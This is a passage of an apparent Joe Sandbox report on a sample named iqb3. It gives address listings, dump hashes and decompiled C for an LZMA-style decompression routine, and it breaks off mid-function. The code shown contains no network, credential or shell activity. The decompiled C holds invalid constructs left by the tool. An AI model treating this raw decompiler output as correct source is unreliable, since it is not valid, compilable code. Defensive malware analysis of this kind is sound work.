                                                                      0x0040677e
                                                                      0x00406781
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406351
                                                                      0x00406351
                                                                      0x00406355
                                                                      0x00406ac2
                                                                      0x00000000
                                                                      0x00406ac2
                                                                      0x0040635b
                                                                      0x0040635e
                                                                      0x00406361
                                                                      0x00406365
                                                                      0x00406368
                                                                      0x0040636e
                                                                      0x00406370
                                                                      0x00406370
                                                                      0x00406370
                                                                      0x00406373
                                                                      0x00406376
                                                                      0x00406376
                                                                      0x00406379
                                                                      0x0040637c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406382
                                                                      0x00406388
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040638e
                                                                      0x0040638e
                                                                      0x00406392
                                                                      0x00406395
                                                                      0x00406398
                                                                      0x0040639b
                                                                      0x0040639e
                                                                      0x0040639f
                                                                      0x004063a2
                                                                      0x004063a4
                                                                      0x004063aa
                                                                      0x004063ad
                                                                      0x004063b0
                                                                      0x004063b3
                                                                      0x004063b6
                                                                      0x004063b9
                                                                      0x004063bc
                                                                      0x004063d8
                                                                      0x004063db
                                                                      0x004063de
                                                                      0x004063e1
                                                                      0x004063e8
                                                                      0x004063ec
                                                                      0x004063ee
                                                                      0x004063f2
                                                                      0x004063be
                                                                      0x004063be
                                                                      0x004063c2
                                                                      0x004063ca
                                                                      0x004063cf
                                                                      0x004063d1
                                                                      0x004063d3
                                                                      0x004063d3
                                                                      0x004063f5
                                                                      0x004063fc
                                                                      0x004063ff
                                                                      0x00000000
                                                                      0x00406405
                                                                      0x00000000
                                                                      0x00406405
                                                                      0x00000000
                                                                      0x0040640a
                                                                      0x0040640a
                                                                      0x0040640e
                                                                      0x00406ace
                                                                      0x00000000
                                                                      0x00406ace
                                                                      0x00406414
                                                                      0x00406417
                                                                      0x0040641a
                                                                      0x0040641e
                                                                      0x00406421
                                                                      0x00406427
                                                                      0x00406429
                                                                      0x00406429
                                                                      0x00406429
                                                                      0x0040642c
                                                                      0x0040642f
                                                                      0x0040642f
                                                                      0x0040642f
                                                                      0x00406435
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406437
                                                                      0x0040643a
                                                                      0x0040643d
                                                                      0x00406440
                                                                      0x00406443
                                                                      0x00406446
                                                                      0x00406449
                                                                      0x0040644c
                                                                      0x0040644f
                                                                      0x00406452
                                                                      0x00406455
                                                                      0x0040646d
                                                                      0x00406470
                                                                      0x00406473
                                                                      0x00406476
                                                                      0x00406476
                                                                      0x00406479
                                                                      0x0040647d
                                                                      0x0040647f
                                                                      0x00406457
                                                                      0x00406457
                                                                      0x0040645f
                                                                      0x00406464
                                                                      0x00406466
                                                                      0x00406468
                                                                      0x00406468
                                                                      0x00406482
                                                                      0x00406489
                                                                      0x0040648c
                                                                      0x00000000
                                                                      0x0040648e
                                                                      0x00000000
                                                                      0x0040648e
                                                                      0x0040648c
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004064ce
                                                                      0x004064ce
                                                                      0x004064d2
                                                                      0x00406ada
                                                                      0x00000000
                                                                      0x00406ada
                                                                      0x004064d8
                                                                      0x004064db
                                                                      0x004064de
                                                                      0x004064e2
                                                                      0x004064e5
                                                                      0x004064eb
                                                                      0x004064ed
                                                                      0x004064ed
                                                                      0x004064ed
                                                                      0x004064f0
                                                                      0x004064f3
                                                                      0x004064f3
                                                                      0x004064f9
                                                                      0x00406497
                                                                      0x00406497
                                                                      0x0040649a
                                                                      0x00000000
                                                                      0x0040649a
                                                                      0x004064fb
                                                                      0x004064fb
                                                                      0x004064fe
                                                                      0x00406501
                                                                      0x00406504
                                                                      0x00406507
                                                                      0x0040650a
                                                                      0x0040650d
                                                                      0x00406510
                                                                      0x00406513
                                                                      0x00406516
                                                                      0x00406519
                                                                      0x00406531
                                                                      0x00406534
                                                                      0x00406537
                                                                      0x0040653a
                                                                      0x0040653a
                                                                      0x0040653d
                                                                      0x00406541
                                                                      0x00406543
                                                                      0x0040651b
                                                                      0x0040651b
                                                                      0x00406523
                                                                      0x00406528
                                                                      0x0040652a
                                                                      0x0040652c
                                                                      0x0040652c
                                                                      0x00406546
                                                                      0x0040654d
                                                                      0x00406550
                                                                      0x00000000
                                                                      0x00406552
                                                                      0x00000000
                                                                      0x00406552
                                                                      0x00000000
                                                                      0x004067df
                                                                      0x004067df
                                                                      0x004067e3
                                                                      0x00406b0a
                                                                      0x00000000
                                                                      0x00406b0a
                                                                      0x004067e9
                                                                      0x004067ec
                                                                      0x004067ef
                                                                      0x004067f3
                                                                      0x004067f6
                                                                      0x004067fc
                                                                      0x004067fe
                                                                      0x004067fe
                                                                      0x004067fe
                                                                      0x00406801
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068ee
                                                                      0x004068f2
                                                                      0x00406914
                                                                      0x00406917
                                                                      0x00406921
                                                                      0x00000000
                                                                      0x00406921
                                                                      0x004068f4
                                                                      0x004068f7
                                                                      0x004068fb
                                                                      0x004068fe
                                                                      0x004068fe
                                                                      0x00406901
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069ab
                                                                      0x004069af
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069d4
                                                                      0x004069db
                                                                      0x004069e2
                                                                      0x004069e2
                                                                      0x00000000
                                                                      0x004069e2
                                                                      0x004069b1
                                                                      0x004069b4
                                                                      0x004069b7
                                                                      0x004069ba
                                                                      0x004069c1
                                                                      0x00406905
                                                                      0x00406905
                                                                      0x00406908
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a9c
                                                                      0x00406a9f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004066d6
                                                                      0x004066d8
                                                                      0x004066df
                                                                      0x004066e0
                                                                      0x004066e2
                                                                      0x004066e5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004066ed
                                                                      0x004066f0
                                                                      0x004066f3
                                                                      0x004066f5
                                                                      0x004066f7
                                                                      0x004066f7
                                                                      0x004066f8
                                                                      0x004066fb
                                                                      0x00406702
                                                                      0x00406705
                                                                      0x00406713
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069e9
                                                                      0x004069e9
                                                                      0x004069ec
                                                                      0x004069f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069f8
                                                                      0x004069f8
                                                                      0x004069fc
                                                                      0x00406b34
                                                                      0x00000000
                                                                      0x00406b34
                                                                      0x00406a02
                                                                      0x00406a05
                                                                      0x00406a08
                                                                      0x00406a0c
                                                                      0x00406a0f
                                                                      0x00406a15
                                                                      0x00406a17
                                                                      0x00406a17
                                                                      0x00406a17
                                                                      0x00406a1a
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a20
                                                                      0x00406a20
                                                                      0x00406a24
                                                                      0x00406a84
                                                                      0x00406a87
                                                                      0x00406a8c
                                                                      0x00406a8d
                                                                      0x00406a8f
                                                                      0x00406a91
                                                                      0x00406a94
                                                                      0x00000000
                                                                      0x00406a94
                                                                      0x00406a26
                                                                      0x00406a2c
                                                                      0x00406a2f
                                                                      0x00406a32
                                                                      0x00406a35
                                                                      0x00406a38
                                                                      0x00406a3b
                                                                      0x00406a3e
                                                                      0x00406a41
                                                                      0x00406a44
                                                                      0x00406a47
                                                                      0x00406a60
                                                                      0x00406a63
                                                                      0x00406a66
                                                                      0x00406a69
                                                                      0x00406a6d
                                                                      0x00406a6f
                                                                      0x00406a6f
                                                                      0x00406a70
                                                                      0x00406a73
                                                                      0x00406a49
                                                                      0x00406a49
                                                                      0x00406a51
                                                                      0x00406a56
                                                                      0x00406a58
                                                                      0x00406a5b
                                                                      0x00406a5b
                                                                      0x00406a76
                                                                      0x00406a7d
                                                                      0x00000000
                                                                      0x00406a7f
                                                                      0x00000000
                                                                      0x00406a7f
                                                                      0x00000000
                                                                      0x0040671b
                                                                      0x0040671e
                                                                      0x00406754
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406887
                                                                      0x00406887
                                                                      0x0040688a
                                                                      0x0040688c
                                                                      0x00406b16
                                                                      0x00000000
                                                                      0x00406b16
                                                                      0x00406892
                                                                      0x00406895
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040689b
                                                                      0x0040689f
                                                                      0x004068a2
                                                                      0x004068a2
                                                                      0x004068a2
                                                                      0x00000000
                                                                      0x004068a2
                                                                      0x00406720
                                                                      0x00406722
                                                                      0x00406724
                                                                      0x00406726
                                                                      0x00406729
                                                                      0x0040672a
                                                                      0x0040672c
                                                                      0x0040672e
                                                                      0x00406731
                                                                      0x00406734
                                                                      0x0040674a
                                                                      0x0040674f
                                                                      0x00406787
                                                                      0x00406787
                                                                      0x0040678b
                                                                      0x004067b7
                                                                      0x004067b9
                                                                      0x004067c0
                                                                      0x004067c3
                                                                      0x004067c6
                                                                      0x004067c6
                                                                      0x004067cb
                                                                      0x004067cb
                                                                      0x004067cd
                                                                      0x004067d0
                                                                      0x004067d7
                                                                      0x004067da
                                                                      0x00406807
                                                                      0x00406807
                                                                      0x0040680a
                                                                      0x0040680d
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00000000
                                                                      0x00406881
                                                                      0x0040680f
                                                                      0x00406815
                                                                      0x00406818
                                                                      0x0040681b
                                                                      0x0040681e
                                                                      0x00406821
                                                                      0x00406824
                                                                      0x00406827
                                                                      0x0040682a
                                                                      0x0040682d
                                                                      0x00406830
                                                                      0x00406849
                                                                      0x0040684b
                                                                      0x0040684e
                                                                      0x0040684f
                                                                      0x00406852
                                                                      0x00406854
                                                                      0x00406857
                                                                      0x00406859
                                                                      0x0040685b
                                                                      0x0040685e
                                                                      0x00406860
                                                                      0x00406863
                                                                      0x00406867
                                                                      0x00406869
                                                                      0x00406869
                                                                      0x0040686a
                                                                      0x0040686d
                                                                      0x00406870
                                                                      0x00406832
                                                                      0x00406832
                                                                      0x0040683a
                                                                      0x0040683f
                                                                      0x00406841
                                                                      0x00406844
                                                                      0x00406844
                                                                      0x00406873
                                                                      0x0040687a
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00000000
                                                                      0x0040687c
                                                                      0x00000000
                                                                      0x0040687c
                                                                      0x0040687a
                                                                      0x0040678d
                                                                      0x00406790
                                                                      0x00406792
                                                                      0x00406795
                                                                      0x00406798
                                                                      0x0040679b
                                                                      0x0040679d
                                                                      0x004067a0
                                                                      0x004067a3
                                                                      0x004067a3
                                                                      0x004067a6
                                                                      0x004067a6
                                                                      0x004067a9
                                                                      0x004067b0
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00000000
                                                                      0x004067b2
                                                                      0x00000000
                                                                      0x004067b2
                                                                      0x004067b0
                                                                      0x00406736
                                                                      0x00406739
                                                                      0x0040673b
                                                                      0x0040673e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040649d
                                                                      0x0040649d
                                                                      0x004064a1
                                                                      0x00406ae6
                                                                      0x00000000
                                                                      0x00406ae6
                                                                      0x004064a7
                                                                      0x004064aa
                                                                      0x004064ad
                                                                      0x004064b0
                                                                      0x004064b3
                                                                      0x004064b6
                                                                      0x004064b9
                                                                      0x004064bb
                                                                      0x004064be
                                                                      0x004064c1
                                                                      0x004064c4
                                                                      0x004064c6
                                                                      0x004064c6
                                                                      0x004064c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068a5
                                                                      0x004068a5
                                                                      0x004068a5
                                                                      0x004068a9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068af
                                                                      0x004068b2
                                                                      0x004068b5
                                                                      0x004068b8
                                                                      0x004068ba
                                                                      0x004068ba
                                                                      0x004068ba
                                                                      0x004068bd
                                                                      0x004068c0
                                                                      0x004068c3
                                                                      0x004068c6
                                                                      0x004068c9
                                                                      0x004068cc
                                                                      0x004068cd
                                                                      0x004068cf
                                                                      0x004068cf
                                                                      0x004068cf
                                                                      0x004068d2
                                                                      0x004068d5
                                                                      0x004068d8
                                                                      0x004068db
                                                                      0x004068de
                                                                      0x004068e2
                                                                      0x004068e4
                                                                      0x004068e7
                                                                      0x00000000
                                                                      0x004068e9
                                                                      0x00000000
                                                                      0x004068e9
                                                                      0x004068e7
                                                                      0x00406b1c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040614b

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ec44333397786e712ce86ed3a064858ade4f3ed38e69d8951d19f407b84ebf46
                                                                      • Instruction ID: e5fca131ad03ef0b1cae302aca876d249310e041a0af9db6593aad5c0906a822
                                                                      • Opcode Fuzzy Hash: ec44333397786e712ce86ed3a064858ade4f3ed38e69d8951d19f407b84ebf46
                                                                      • Instruction Fuzzy Hash: DA814571E04228CFDF24CFA8C8447ADBBB1FB45305F25816AD416BB281D7789A96DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406557 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E00406557() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406B5B))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
